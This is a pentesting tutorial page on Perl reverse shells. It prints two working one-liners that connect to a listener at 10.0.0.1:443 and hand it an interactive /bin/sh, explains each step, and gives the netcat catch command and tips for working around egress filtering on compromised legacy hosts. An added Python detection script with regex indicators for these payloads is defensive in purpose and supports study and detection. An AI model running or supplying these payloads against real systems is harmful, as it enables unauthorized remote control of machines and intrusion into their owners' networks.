Perl Reverse Shell: The One-Liner That Works on Ancient Boxes
How the perl reverse shell works with the Socket module, the classic one-liner, and why Perl is the fallback on legacy Unix systems.
Perl is the survivor's interpreter. Long after a minimal container drops python and a hardened box loses nc -e, an old Unix system, a network appliance, or a legacy CGI host still has Perl. That is exactly when the perl reverse shell earns its place in your notes.
The Classic One-Liner
perl -e 'use Socket;$i="10.0.0.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Step by step:
- use Socket pulls in the networking constants and helpers.
- socket(S,...) creates a TCP socket; connect(S, sockaddr_in($p, inet_aton($i))) dials your listener at $i:$p.
- open(STDIN,">&S"), open(STDOUT,">&S"), open(STDERR,">&S") point the three standard streams at the socket S.
- exec("/bin/sh -i") replaces Perl with an interactive shell wired to that socket.
Catch it with nc -lvnp 443. It is verbose because Perl makes you build the socket explicitly, but it depends only on the core Socket module, which is always present.
A Shorter IO::Socket Variant
If IO::Socket::INET is available, the payload shrinks and can fork to the background:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
The fork detaches it, which is handy when you are running it through a context that would otherwise block.
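Both one-liners above leave the same trace in process-creation telemetry: inline Perl that uses the socket API and then rewires stdio or hands input to a shell. The following detection sketch is an added example, not part of the original page; the indicator names, the flagging rule, and the benign sample lines are assumptions made for illustration.

```python
import re

# Heuristic indicators for the two one-liner shapes on this page.
# Indicator names and the flagging rule are this example's own assumptions.
INDICATORS = {
    "inline_code": re.compile(r"\bperl\b.*?\s-\w*[eE]\s"),
    "socket_api": re.compile(r"use\s+Socket|\bsocket\s*\(|IO::Socket|-MIO\b"),
    "stdio_to_socket": re.compile(
        r"open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*[\"']?[<>+]*&"
        r"|(?:STD(?:IN|OUT|ERR)|\$~)->fdopen"),
    "shell_exec": re.compile(r"\b(?:exec|system)\b.{0,40}?(?:/bin/\w*sh\b|\$_)"),
}

# Constructed process-creation command lines: the page's two payloads plus
# benign Perl usage (hostnames and paths below are made up).
SAMPLE_CMDLINES = [
    r"""perl -e 'use Socket;$i="10.0.0.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""",
    r"""perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'""",
    r"""perl -MIO::Socket::INET -e '$c=IO::Socket::INET->new(PeerAddr=>"mail.example.internal:25") or die;print scalar <$c>;'""",
    r"""perl -e 'print "hello\n"'""",
    r"""perl -e 'system("/bin/sh -c uptime")'""",
    r"""perl /usr/share/app/report.pl --out /tmp/r.csv""",
]

def classify(cmdline):
    """Return (flagged, hits): flagged when inline Perl uses the socket API
    and also rewires stdio to a handle or hands input to a shell."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    flagged = ("inline_code" in hits and "socket_api" in hits
               and ("stdio_to_socket" in hits or "shell_exec" in hits))
    return flagged, hits

def scan(cmdlines):
    """Return the indexes of command lines that classify() flags."""
    return [i for i, c in enumerate(cmdlines) if classify(c)[0]]

if __name__ == "__main__":
    for i, c in enumerate(SAMPLE_CMDLINES):
        flagged, hits = classify(c)
        print(i, "ALERT" if flagged else "ok", hits)
```

Command-line matching only sees code passed with -e; the same logic run from a script file or fed on stdin has to be caught from behaviour instead, such as an interpreter whose stdin, stdout and stderr all point at a network socket before a shell is executed.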
When It Won't Connect
- No Perl — rare on traditional Unix, but check which perl. Fall back to bash or netcat.
- Quoting — the -e script is single-quoted; nested single quotes break it. See payload quoting.
- Egress filtered — prefer 443/80; test per egress filtering.
- Listener mismatch — see choosing a listener.
Full triage: why reverse shells fail.
Generate It
The reverse shell generator produces the perl one-liner with your LHOST/LPORT set and the matching listener attached — useful precisely when you have landed on a legacy box and want the syntax right the first time.
Authorized Testing Only
Use perl reverse shells only against systems you own or are explicitly authorized to test. The technique is identical regardless of intent; authorization is what makes it legitimate.